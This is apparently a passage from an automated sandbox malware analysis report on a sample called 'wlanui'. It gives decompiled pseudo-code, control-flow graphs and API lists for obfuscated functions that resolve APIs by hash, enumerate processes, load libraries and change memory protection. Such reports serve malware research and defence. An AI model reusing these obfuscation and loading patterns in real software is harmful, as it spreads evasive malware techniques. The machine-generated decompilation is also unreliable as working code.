                                                        0x004871cb
                                                        0x004871c9
                                                        0x004871c2
                                                        0x004871bb
                                                        0x00000000
                                                        0x00487227
                                                        0x00487227
                                                        0x00487227
                                                        0x00487232
                                                        0x00000000

                                                        APIs
                                                        • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,004868AC), ref: 00487266
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335374791.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                        • Associated: 0000000F.00000002.2335370463.0000000000480000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335386868.000000000048D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335391948.000000000048F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_480000_wlanui.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: Dry9$Dry9$`~0
                                                        • API String ID: 1029625771-3531319433
                                                        • Opcode ID: a9dfa365f8032d6b3aaf3dda42931ff0ea85fc48eb216d0a37d59ef9a1e7d5c1
                                                        • Instruction ID: 66106714440e131fab14b10a8e93016a10e6ad252dfb3435b535883a5325fca6
                                                        • Opcode Fuzzy Hash: a9dfa365f8032d6b3aaf3dda42931ff0ea85fc48eb216d0a37d59ef9a1e7d5c1
                                                        • Instruction Fuzzy Hash: 7B316420B1D10043DA28FABA58B572F11A6DBA1708B744C6FF661CBB95DE2DCD02539E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 601 4830a0-4830b6 602 4830ba-4830bf 601->602 603 4830c0-4830c5 602->603 604 4830cb 603->604 605 483201-483206 603->605 606 4831ed-4831f1 604->606 607 4830d1-4830d6 604->607 608 483208-48320d 605->608 609 483245-48324c 605->609 610 4832f6-483300 606->610 611 4831f7-4831fc 606->611 612 4831da-4831e8 607->612 613 4830dc-4830e1 607->613 614 4832ab-4832b3 608->614 615 483213-483218 608->615 616 483269-483274 609->616 617 48324e-483264 call 483f00 call 483e60 609->617 611->603 612->603 619 4831a0-4831a8 613->619 620 4830e7-4830ec 613->620 623 4832d3-4832f3 614->623 624 4832b5-4832cd call 483f00 call 483e60 614->624 621 48321a-483228 call 483d00 615->621 622 48322d-483232 615->622 636 483291-48329f RtlAllocateHeap 616->636 637 483276-48328c call 483f00 call 483e60 616->637 617->616 630 4831c8-4831d5 619->630 631 4831aa-4831c2 call 483f00 call 483e60 619->631 620->622 628 4830f2-48319b 620->628 621->602 622->603 632 483238-483242 622->632 623->610 624->623 628->602 630->602 631->630 636->610 644 4832a1-4832a6 636->644 637->636 644->602
                                                        C-Code - Quality: 71%
                                                        			E004830A0() {
                                                        				void* __ebx;
                                                        				void* __ecx;
                                                        				void* __ebp;
                                                        				void* _t61;
                                                        				intOrPtr* _t62;
                                                        				void* _t65;
                                                        				intOrPtr _t93;
                                                        				intOrPtr* _t95;
                                                        				intOrPtr _t107;
                                                        				intOrPtr* _t116;
                                                        				void* _t127;
                                                        				void* _t128;
                                                        				intOrPtr _t129;
                                                        				signed int _t134;
                                                        				void* _t135;
                                                        				void* _t136;
                                                        
                                                        				_t93 =  *((intOrPtr*)(_t135 + 0xc));
                                                        				_t61 = 0x11f367c2;
                                                        				_t134 =  *(_t135 + 0x10);
                                                        				_t129 =  *((intOrPtr*)(_t135 + 0x14));
                                                        				_t127 =  *(_t135 + 0x18);
                                                        				while(1) {
                                                        					L1:
                                                        					do {
                                                        						while(1) {
                                                        							L2:
                                                        							_t136 = _t61 - 0x12466c01;
                                                        							if(_t136 > 0) {
                                                        								break;
                                                        							}
                                                        							if(_t136 == 0) {
                                                        								if(_t93 !=  *(_t135 + 0x18)) {
                                                        									L29:
                                                        									return 1;
                                                        								} else {
                                                        									_t61 = 0x2f21cdd2;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t61 == 0x7a26146) {
                                                        									_t61 =  ==  ? 0x2f21cdd2 : 0x12466c01;
                                                        									continue;
                                                        								} else {
                                                        									if(_t61 == 0x8928514) {
                                                        										_t95 =  *0x48e1cc;
                                                        										if(_t95 == 0) {
                                                        											_t95 = E00483E60(_t93, E00483F00(0x55ab7d30), 0x815a9da3, _t134);
                                                        											 *0x48e1cc = _t95;
                                                        										}
                                                        										_t129 =  *_t95(_t134 + 0x2c);
                                                        										_t61 = 0x39d78901;
                                                        										while(1) {
                                                        											L1:
                                                        											goto L2;
                                                        										}
                                                        									} else {
                                                        										if(_t61 != 0x11f367c2) {
                                                        											goto L18;
                                                        										} else {
                                                        											 *(_t135 + 0x18) = 0x2e7c;
                                                        											 *(_t135 + 0x18) = 0x3e0f83e1 *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 7;
                                                        											 *(_t135 + 0x18) = 0x2f149903 *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) + 0xffff1475;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) * 0x15;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 2;
                                                        											 *(_t135 + 0x18) = 0x22b63cbf *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) ^ 0x8ee7705c;
                                                        											 *(_t135 + 0x10) = 0xa461;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) << 0xe;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) * 8 -  *(_t135 + 0x10) << 2;
                                                        											_t61 = 0x8928514;
                                                        											 *(_t135 + 0x10) = 0x51eb851f *  *(_t135 + 0x10) >> 0x20 >> 3;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) + 0xffffb6ab;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) ^ 0x88f30986;
                                                        											while(1) {
                                                        												L1:
                                                        												goto L2;
                                                        											}
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							L30:
                                                        						}
                                                        						if(_t61 == 0x2f21cdd2) {
                                                        							_t62 =  *0x48e494;
                                                        							if(_t62 == 0) {
                                                        								_t62 = E00483E60(_t93, E00483F00(0x9bab0b12), 0x7facde30, _t134);
                                                        								 *0x48e494 = _t62;
                                                        							}
                                                        							_t128 =  *_t62();
                                                        							if( *0x48dd18 == 0) {
                                                        								 *0x48dd18 = E00483E60(_t93, E00483F00(0x9bab0b12), 0x9ff0609c, _t134);
                                                        							}
                                                        							_t65 = RtlAllocateHeap(_t128, 8, 0x24c); // executed
                                                        							_t127 = _t65;
                                                        							if(_t127 == 0) {
                                                        								goto L29;
                                                        							} else {
                                                        								_t61 = 0x35eaa088;
                                                        								goto L1;
                                                        							}
                                                        						} else {
                                                        							if(_t61 == 0x35eaa088) {
                                                        								_t116 =  *0x48e43c;
                                                        								if(_t116 == 0) {
                                                        									_t116 = E00483E60(_t93, E00483F00(0x9bab0b12), 0x2df4d385, _t134);
                                                        									 *0x48e43c = _t116;
                                                        								}
                                                        								 *_t116(_t127 + 0x3c, _t134 + 0x2c, (_t129 - _t134 - 0x2c >> 1) + 1);
                                                        								_t107 =  *((intOrPtr*)(_t135 + 0x1c));
                                                        								 *(_t127 + 0x2c) =  *(_t107 + 0x1c);
                                                        								 *((intOrPtr*)(_t107 + 0xc)) =  *((intOrPtr*)(_t107 + 0xc)) + 1;
                                                        								 *(_t107 + 0x1c) = _t127;
                                                        								goto L29;
                                                        							} else {
                                                        								if(_t61 != 0x39d78901) {
                                                        									goto L18;
                                                        								} else {
                                                        									_t93 = E00483D00(_t129);
                                                        									_t61 = 0x7a26146;
                                                        									while(1) {
                                                        										L1:
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L30;
                                                        						L18:
                                                        					} while (_t61 != 0x100ad7b4);
                                                        					return 1;
                                                        					goto L30;
                                                        				}
                                                        			}



















                                                        0x004830a2
                                                        0x004830a6
                                                        0x004830ac
                                                        0x004830b1
                                                        0x004830b6
                                                        0x004830ba
                                                        0x004830ba
                                                        0x004830c0
                                                        0x004830c0
                                                        0x004830c0
                                                        0x004830c0
                                                        0x004830c5
                                                        0x00000000
                                                        0x00000000
                                                        0x004830cb
                                                        0x004831f1
                                                        0x004832f9
                                                        0x00483300
                                                        0x004831f7
                                                        0x004831f7
                                                        0x00000000
                                                        0x004831f7
                                                        0x004830d1
                                                        0x004830d6
                                                        0x004831e5
                                                        0x00000000
                                                        0x004830dc
                                                        0x004830e1
                                                        0x004831a0
                                                        0x004831a8
                                                        0x004831c0
                                                        0x004831c2
                                                        0x004831c2
                                                        0x004831ce
                                                        0x004831d0
                                                        0x004830ba
                                                        0x004830ba
                                                        0x00000000
                                                        0x004830ba
                                                        0x004830e7
                                                        0x004830ec
                                                        0x00000000
                                                        0x004830f2
                                                        0x004830f2
                                                        0x0048310d
                                                        0x00483111
                                                        0x0048311f
                                                        0x00483123
                                                        0x00483130
                                                        0x00483139
                                                        0x00483147
                                                        0x0048314b
                                                        0x00483153
                                                        0x0048315b
                                                        0x00483175
                                                        0x0048317f
                                                        0x00483187
                                                        0x0048318b
                                                        0x00483193
                                                        0x004830ba
                                                        0x004830ba
                                                        0x00000000
                                                        0x004830ba
                                                        0x004830ba
                                                        0x004830ec
                                                        0x004830e1
                                                        0x004830d6
                                                        0x00000000
                                                        0x004830cb
                                                        0x00483206
                                                        0x00483245
                                                        0x0048324c
                                                        0x0048325f
                                                        0x00483264
                                                        0x00483264
                                                        0x0048326b
                                                        0x00483274
                                                        0x0048328c
                                                        0x0048328c
                                                        0x00483299
                                                        0x0048329b
                                                        0x0048329f
                                                        0x00000000
                                                        0x004832a1
                                                        0x004832a1
                                                        0x00000000
                                                        0x004832a1
                                                        0x00483208
                                                        0x0048320d
                                                        0x004832ab
                                                        0x004832b3
                                                        0x004832cb
                                                        0x004832cd
                                                        0x004832cd
                                                        0x004832e4
                                                        0x004832e6
                                                        0x004832ed
                                                        0x004832f0
                                                        0x004832f3
                                                        0x00000000
                                                        0x00483213
                                                        0x00483218
                                                        0x00000000
                                                        0x0048321a
                                                        0x00483221
                                                        0x00483223
                                                        0x004830ba
                                                        0x004830ba
                                                        0x00000000
                                                        0x004830ba
                                                        0x004830ba
                                                        0x00483218
                                                        0x0048320d
                                                        0x00000000
                                                        0x0048322d
                                                        0x0048322d
                                                        0x00483242
                                                        0x00000000
                                                        0x00483242

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000008,0000024C), ref: 00483299
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335374791.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                        • Associated: 0000000F.00000002.2335370463.0000000000480000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335386868.000000000048D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335391948.000000000048F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_480000_wlanui.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID: |.
                                                        • API String ID: 1279760036-512043466
                                                        • Opcode ID: c8e0f2247b809fe7050beabf575e9272acfc8d4a4aee266febf3a929a62a0641
                                                        • Instruction ID: 89bbe83a485cb83e73fbbf4fe943f9ff96bb492918812a49f53d8b3427825a34
                                                        • Opcode Fuzzy Hash: c8e0f2247b809fe7050beabf575e9272acfc8d4a4aee266febf3a929a62a0641
                                                        • Instruction Fuzzy Hash: 5C51BF71A083018BC718EF6D848452FBBE6EBD4B05F204C2FE551CB351DB79DA49879A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 652 487080-487092 call 4834c0 655 4870af-4870c3 LoadLibraryW 652->655 656 487094-4870aa call 483f00 call 483e60 652->656 658 4870e0-4870eb 655->658 659 4870c5-4870db call 483f00 call 483e60 655->659 656->655 665 487108-487110 658->665 666 4870ed-487103 call 483f00 call 483e60 658->666 659->658 666->665
                                                        C-Code - Quality: 75%
                                                        			E00487080(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
                                                        				struct HINSTANCE__* _t6;
                                                        				intOrPtr* _t7;
                                                        				intOrPtr* _t9;
                                                        				intOrPtr _t17;
                                                        				signed int _t28;
                                                        				void* _t29;
                                                        				WCHAR* _t30;
                                                        				void* _t31;
                                                        
                                                        				_t15 = __ebx;
                                                        				_t28 = __edx;
                                                        				_t30 = E004834C0(__ecx);
                                                        				if( *0x48dd1c == 0) {
                                                        					 *0x48dd1c = E00483E60(__ebx, E00483F00(0x9bab0b12), 0xe4b28d97, _t31);
                                                        				}
                                                        				_t6 = LoadLibraryW(_t30);
                                                        				_t17 =  *0x48e548; // 0x307e60
                                                        				 *(_t17 + 0x30 + _t28 * 4) = _t6;
                                                        				_t7 =  *0x48e494;
                                                        				if(_t7 == 0) {
                                                        					_t7 = E00483E60(_t15, E00483F00(0x9bab0b12), 0x7facde30, _t31);
                                                        					 *0x48e494 = _t7;
                                                        				}
                                                        				_t29 =  *_t7();
                                                        				_t9 =  *0x48df30;
                                                        				if(_t9 == 0) {
                                                        					_t9 = E00483E60(_t15, E00483F00(0x9bab0b12), 0x5010a54d, _t31);
                                                        					 *0x48df30 = _t9;
                                                        				}
                                                        				return  *_t9(_t29, 0, _t30);
                                                        			}











                                                        0x00487080
                                                        0x00487082
                                                        0x00487089
                                                        0x00487092
                                                        0x004870aa
                                                        0x004870aa
                                                        0x004870b0
                                                        0x004870b2
                                                        0x004870b8
                                                        0x004870bc
                                                        0x004870c3
                                                        0x004870d6
                                                        0x004870db
                                                        0x004870db
                                                        0x004870e2
                                                        0x004870e4
                                                        0x004870eb
                                                        0x004870fe
                                                        0x00487103
                                                        0x00487103
                                                        0x00487110

                                                        APIs
                                                        • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,0048721D,004868AC), ref: 004870B0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335374791.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                        • Associated: 0000000F.00000002.2335370463.0000000000480000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335386868.000000000048D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335391948.000000000048F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_480000_wlanui.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: `~0
                                                        • API String ID: 1029625771-552826598
                                                        • Opcode ID: 11a21e2f709940b74ad35f04aac606a26528a9bdffb88a19fc90b1da96b35267
                                                        • Instruction ID: eb98fcc46bb21d32a7229e2e291240f38f030f83389d01d33332ad85e7d27b7c
                                                        • Opcode Fuzzy Hash: 11a21e2f709940b74ad35f04aac606a26528a9bdffb88a19fc90b1da96b35267
                                                        • Instruction Fuzzy Hash: 9C014430B152104BDB14BF7A985162F26EB9FD1E4C7100C3EA619C7355EA38CD02979D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 675 484c98-484c9f 676 484ca0-484ca5 675->676 677 484cab 676->677 678 484d63-484d68 676->678 679 484cad-484cb2 677->679 680 484d24-484d2b 677->680 681 484d6a-484d6f 678->681 682 484d86-484d95 678->682 686 484d1a-484d1f 679->686 687 484cb4-484cb9 679->687 683 484d48-484d5e 680->683 685 484d2d-484d43 call 483f00 call 483e60 680->685 688 484d71-484d76 681->688 689 484db4-484dbb 681->689 682->683 684 484d97-484db2 call 483f00 call 483e60 682->684 683->676 684->683 685->683 686->676 693 484cbb-484cc0 687->693 694 484d02-484d18 687->694 688->676 690 484d7c-484d85 688->690 695 484dd8-484dd9 CloseHandle 689->695 696 484dbd-484dd3 call 483f00 call 483e60 689->696 693->688 699 484cc6-484ccd 693->699 694->676 702 484ddb-484de4 695->702 696->695 706 484cea-484cf5 CreateToolhelp32Snapshot 699->706 707 484ccf-484ce5 call 483f00 call 483e60 699->707 706->702 713 484cfb-484d00 706->713 707->706 713->676
                                                        C-Code - Quality: 74%
                                                        			E00484C98(void* __eax, intOrPtr* __ebx, void* __ebp, char _a16) {
                                                        				void* _t4;
                                                        				intOrPtr* _t5;
                                                        				signed int _t6;
                                                        				int _t11;
                                                        				signed int _t16;
                                                        				intOrPtr _t19;
                                                        				intOrPtr* _t22;
                                                        				void* _t38;
                                                        				void* _t41;
                                                        				void* _t44;
                                                        				void* _t48;
                                                        
                                                        				_t44 = __ebp;
                                                        				_t22 = __ebx;
                                                        				_t4 = __eax;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t48 = _t4 - 0x29f16ba1;
                                                        						if(_t48 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t48 == 0) {
                                                        							_t5 =  *0x48e498;
                                                        							if(_t5 == 0) {
                                                        								_t5 = E00483E60(_t22, E00483F00(0x9bab0b12), 0xb6f23f63, _t44);
                                                        								 *0x48e498 = _t5;
                                                        							}
                                                        							L14:
                                                        							_t6 =  *_t5(_t41,  &_a16);
                                                        							asm("sbb eax, eax");
                                                        							_t4 = ( ~_t6 & 0xe5fc70a2) + 0x2fd2b757;
                                                        							continue;
                                                        						} else {
                                                        							if(_t4 == 0xf1114c0) {
                                                        								_t4 = 0x1f097f05;
                                                        								continue;
                                                        							} else {
                                                        								if(_t4 == 0x15cf27f9) {
                                                        									_t16 =  *_t22( &_a16, _t38);
                                                        									asm("sbb eax, eax");
                                                        									_t4 = ( ~_t16 & 0xfa1eb44a) + 0x2fd2b757;
                                                        									continue;
                                                        								} else {
                                                        									if(_t4 != 0x1f097f05) {
                                                        										goto L17;
                                                        									} else {
                                                        										_t19 =  *0x48e290; // 0x7671733f
                                                        										if(_t19 == 0) {
                                                        											 *0x48e290 = E00483E60(_t22, E00483F00(0x9bab0b12), 0xbf0ea04d, _t44);
                                                        										}
                                                        										_t11 = CreateToolhelp32Snapshot(2, 0); // executed
                                                        										_t41 = _t11;
                                                        										if(_t41 == 0xffffffff) {
                                                        											L24:
                                                        											return _t11;
                                                        										} else {
                                                        											_t4 = 0x2e0e6e55;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L25:
                                                        					}
                                                        					if(_t4 == 0x2e0e6e55) {
                                                        						_t5 =  *0x48e1b4;
                                                        						_a16 = 0x22c;
                                                        						if(_t5 == 0) {
                                                        							_t5 = E00483E60(_t22, E00483F00(0x9bab0b12), 0x188a0580, _t44);
                                                        							 *0x48e1b4 = _t5;
                                                        						}
                                                        						goto L14;
                                                        					} else {
                                                        						if(_t4 == 0x2fd2b757) {
                                                        							if( *0x48de3c == 0) {
                                                        								 *0x48de3c = E00483E60(_t22, E00483F00(0x9bab0b12), 0x20de7595, _t44);
                                                        							}
                                                        							_t11 = CloseHandle(_t41); // executed
                                                        							goto L24;
                                                        						} else {
                                                        							goto L17;
                                                        						}
                                                        					}
                                                        					goto L25;
                                                        					L17:
                                                        				} while (_t4 != 0x9d8354f);
                                                        				return _t4;
                                                        				goto L25;
                                                        			}














                                                        0x00484c98
                                                        0x00484c98
                                                        0x00484c98
                                                        0x00484c98
                                                        0x00484ca0
                                                        0x00484ca0
                                                        0x00484ca0
                                                        0x00484ca0
                                                        0x00484ca5
                                                        0x00000000
                                                        0x00000000
                                                        0x00484cab
                                                        0x00484d24
                                                        0x00484d2b
                                                        0x00484d3e
                                                        0x00484d43
                                                        0x00484d43
                                                        0x00484d48
                                                        0x00484d4e
                                                        0x00484d52
                                                        0x00484d59
                                                        0x00000000
                                                        0x00484cad
                                                        0x00484cb2
                                                        0x00484d1a
                                                        0x00000000
                                                        0x00484cb4
                                                        0x00484cb9
                                                        0x00484d08
                                                        0x00484d0c
                                                        0x00484d13
                                                        0x00000000
                                                        0x00484cbb
                                                        0x00484cc0
                                                        0x00000000
                                                        0x00484cc6
                                                        0x00484cc6
                                                        0x00484ccd
                                                        0x00484ce5
                                                        0x00484ce5
                                                        0x00484cee
                                                        0x00484cf0
                                                        0x00484cf5
                                                        0x00484ddb
                                                        0x00484de4
                                                        0x00484cfb
                                                        0x00484cfb
                                                        0x00000000
                                                        0x00484cfb
                                                        0x00484cf5
                                                        0x00484cc0
                                                        0x00484cb9
                                                        0x00484cb2
                                                        0x00000000
                                                        0x00484cab
                                                        0x00484d68
                                                        0x00484d86
                                                        0x00484d8b
                                                        0x00484d95
                                                        0x00484da8
                                                        0x00484dad
                                                        0x00484dad
                                                        0x00000000
                                                        0x00484d6a
                                                        0x00484d6f
                                                        0x00484dbb
                                                        0x00484dd3
                                                        0x00484dd3
                                                        0x00484dd9
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00484d6f
                                                        0x00000000
                                                        0x00484d71
                                                        0x00484d71
                                                        0x00484d85
                                                        0x00000000

                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00484CEE
                                                        • CloseHandle.KERNEL32(?,00000000,?,?), ref: 00484DD9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335374791.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                        • Associated: 0000000F.00000002.2335370463.0000000000480000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335386868.000000000048D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335391948.000000000048F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_480000_wlanui.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateHandleSnapshotToolhelp32
                                                        • String ID: ?sqv
                                                        • API String ID: 3280610774-1358527836
                                                        • Opcode ID: 222f8bc00e7f72b30ee476545d216423a7909dd4926a91bd4891601d0fbbf022
                                                        • Instruction ID: 559249d3702fe7ad0e4d3494aab149ff36bdcf70a44ee6c54bd6eebe0428e763
                                                        • Opcode Fuzzy Hash: 222f8bc00e7f72b30ee476545d216423a7909dd4926a91bd4891601d0fbbf022
                                                        • Instruction Fuzzy Hash: CBF02B30A002134ACA347F299C8573E61D967D1754F140D2BEA29C73F1E71C8C51538D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 718 460580-4605be call 460ed0 721 4605d2-4605da 718->721 722 4605c0-4605cf 718->722 723 4606e7-4606ef 721->723 724 4605e0-4605e3 721->724 724->723 725 4605e9-4605eb 724->725 725->723 727 4605f1-4605fc 725->727 727->723 728 460602-460607 727->728 729 46060d-460629 call 461140 RtlMoveMemory 728->729 730 4606d8-4606e4 728->730 733 460654-460659 729->733 734 46062b-460630 729->734 737 46066c-460678 733->737 738 46065b-46066a 733->738 735 460632-460641 734->735 736 460643-460652 734->736 739 460679-460699 call 461140 735->739 736->739 737->739 738->739 739->723 742 46069b-4606a3 VirtualProtect 739->742 743 4606c6-4606d5 742->743 744 4606a5-4606a8 742->744 744->723 745 4606aa-4606ad 744->745 745->723 746 4606af-4606b1 745->746 746->729 747 4606b7-4606c3 746->747
                                                        APIs
                                                          • Part of subcall function 00460FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00460F08
                                                          • Part of subcall function 00460FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00460F3E
                                                          • Part of subcall function 00460FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00460F7F
                                                        • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 0046061B
                                                        • VirtualProtect.KERNEL32(00000000,-00000018,?,00000000,00000000,00000000,-00000018,00000028,?,?,?,00000000,00000000,?,00000000), ref: 0046069C
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335360642.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_460000_wlanui.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 4043890290-0
                                                        • Opcode ID: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                        • Instruction ID: f7087a817c4f420740b8970532b9dd7f8c110cd4a276a62b8381f1873e8552d4
                                                        • Opcode Fuzzy Hash: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                        • Instruction Fuzzy Hash: E73126B365830557E3249A6ADC45BEBA3D4DBE5354F08083BF905D2290F52ED4A8C26F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 748 489dd0-489dde 749 489de0-489de5 748->749 750 489ec8-489ecd 749->750 751 489deb 749->751 754 489e03-489e08 750->754 755 489ed3-489ed8 750->755 752 489e89-489e90 751->752 753 489df1-489df6 751->753 758 489ead-489ec3 752->758 759 489e92-489ea8 call 483f00 call 483e60 752->759 756 489df8-489dfd 753->756 757 489e16-489e26 753->757 754->749 760 489e0a-489e15 754->760 755->749 756->754 761 489edd-489ee4 756->761 763 489e28-489e40 call 483f00 call 483e60 757->763 764 489e46-489e4e 757->764 758->749 759->758 770 489f01-489f25 761->770 771 489ee6-489efc call 483f00 call 483e60 761->771 763->764 768 489e6e-489e84 GetCurrentProcess QueryFullProcessImageNameW 764->768 769 489e50-489e68 call 483f00 call 483e60 764->769 768->749 769->768 771->770
                                                        C-Code - Quality: 68%
                                                        			E00489DD0(void* __ebp) {
                                                        				char _v520;
                                                        				char _v1040;
                                                        				char _v1044;
                                                        				void* __ebx;
                                                        				void* _t7;
                                                        				intOrPtr* _t9;
                                                        				intOrPtr* _t20;
                                                        				intOrPtr* _t42;
                                                        				void* _t45;
                                                        				void* _t48;
                                                        
                                                        				_t45 = __ebp;
                                                        				_t7 = 0x2bf5e22e;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t48 = _t7 - 0x282e0bc9;
                                                        						if(_t48 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t48 == 0) {
                                                        							_t9 =  *0x48e3f4;
                                                        							if(_t9 == 0) {
                                                        								_t9 = E00483E60(0, E00483F00(0x9bab0b12), 0x7dc9b9bb, _t45);
                                                        								 *0x48e3f4 = _t9;
                                                        							}
                                                        							 *_t9(0,  &_v520, 0x104);
                                                        							_t7 = 0x1d217ac5;
                                                        							continue;
                                                        						} else {
                                                        							if(_t7 == 0x1d217ac5) {
                                                        								_v1044 = 0x104;
                                                        								if( *0x48def8 == 0) {
                                                        									 *0x48def8 = E00483E60(0, E00483F00(0x9bab0b12), 0x55856f39, _t45);
                                                        								}
                                                        								_t42 =  *0x48e220;
                                                        								if(_t42 == 0) {
                                                        									_t42 = E00483E60(0, E00483F00(0x9bab0b12), 0xa63d263c, _t45);
                                                        									 *0x48e220 = _t42;
                                                        								}
                                                        								 *_t42(GetCurrentProcess(), 0,  &_v1040,  &_v1044); // executed
                                                        								_t7 = 0x20509b25;
                                                        								continue;
                                                        							} else {
                                                        								if(_t7 == 0x20509b25) {
                                                        									_t20 =  *0x48e05c;
                                                        									if(_t20 == 0) {
                                                        										_t20 = E00483E60(0, E00483F00(0x9bab0b12), 0xbdfcd29a, _t45);
                                                        										 *0x48e05c = _t20;
                                                        									}
                                                        									 *_t20( &_v520,  &_v1040);
                                                        									_t25 =  !=  ? 1 : 0;
                                                        									_t22 =  !=  ? 1 : 0;
                                                        									return  !=  ? 1 : 0;
                                                        								} else {
                                                        									goto L5;
                                                        								}
                                                        							}
                                                        						}
                                                        						L20:
                                                        					}
                                                        					if(_t7 != 0x2bf5e22e) {
                                                        						goto L5;
                                                        					} else {
                                                        						_t7 = 0x282e0bc9;
                                                        						goto L1;
                                                        					}
                                                        					goto L20;
                                                        					L5:
                                                        				} while (_t7 != 0x1daf8c8f);
                                                        				return 0;
                                                        				goto L20;
                                                        			}













                                                        0x00489dd0
                                                        0x00489dd6
                                                        0x00489dde
                                                        0x00489de0
                                                        0x00489de0
                                                        0x00489de0
                                                        0x00489de0
                                                        0x00489de5
                                                        0x00000000
                                                        0x00000000
                                                        0x00489deb
                                                        0x00489e89
                                                        0x00489e90
                                                        0x00489ea3
                                                        0x00489ea8
                                                        0x00489ea8
                                                        0x00489ebc
                                                        0x00489ebe
                                                        0x00000000
                                                        0x00489df1
                                                        0x00489df6
                                                        0x00489e1c
                                                        0x00489e26
                                                        0x00489e40
                                                        0x00489e40
                                                        0x00489e46
                                                        0x00489e4e
                                                        0x00489e66
                                                        0x00489e68
                                                        0x00489e68
                                                        0x00489e7d
                                                        0x00489e7f
                                                        0x00000000
                                                        0x00489df8
                                                        0x00489dfd
                                                        0x00489edd
                                                        0x00489ee4
                                                        0x00489ef7
                                                        0x00489efc
                                                        0x00489efc
                                                        0x00489f0e
                                                        0x00489f18
                                                        0x00489f1c
                                                        0x00489f25
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00489dfd
                                                        0x00489df6
                                                        0x00000000
                                                        0x00489deb
                                                        0x00489ecd
                                                        0x00000000
                                                        0x00489ed3
                                                        0x00489ed3
                                                        0x00000000
